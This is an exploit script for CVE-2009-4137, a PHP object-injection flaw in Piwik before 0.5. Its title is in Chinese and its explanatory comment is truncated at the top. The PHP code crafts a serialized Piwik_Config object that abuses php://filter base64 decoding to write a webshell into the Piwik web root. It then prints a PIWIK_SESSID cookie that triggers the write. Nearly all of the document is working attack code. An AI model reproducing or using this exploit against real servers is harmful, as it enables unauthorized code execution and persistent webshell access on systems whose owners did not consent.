CVE-2009-4137_Piwik_before_0.5_任意代碼執行_文件上傳漏洞

# CVE-2009-4137 Piwik before 0.5 任意代碼執行/文件上傳漏洞
==EXP==

 DO NOT REMOVE THIS LINE\n";
$configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";

To circumvent this, we use php://filter/write=convert.base64-decode and pre-encode our payload. PHP is nice enough to just skip every character that is not part of the base64 alphabet

We then prepend a single character to correct the padding to our payload and write a simple php webshell.
A request to the piwik server with the cookie then triggers the exploit

(You need to url_encode the Cookie if you use manual requests. The '+' and '/' characters of the base64 alphabet must be encoded)
*/

class Zend_Config {
    protected $_data = array(
        "login" => "root",
        "password" => "rootroot",
        "email" => "root@rootroot.com"
    );
}

class Piwik_Config {
    protected $configFileUpdated = true;
    protected $doWriteFileWhenUpdated = true;
    protected $correctCwd = ".";
    protected $pathIniFileUserConfig = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";
    protected $userConfig = array();

    function __construct() { // 'a' for padding
	$this->userConfig["a".base64_encode(''."\n")] = new Zend_Config;
    }
}

$b64 = base64_encode(serialize(new Piwik_Config));
$urlEncoded = urlencode($b64);
echo "Use this cookie";
echo "PIWIK_SESSID=".$urlEncoded."\n";

?>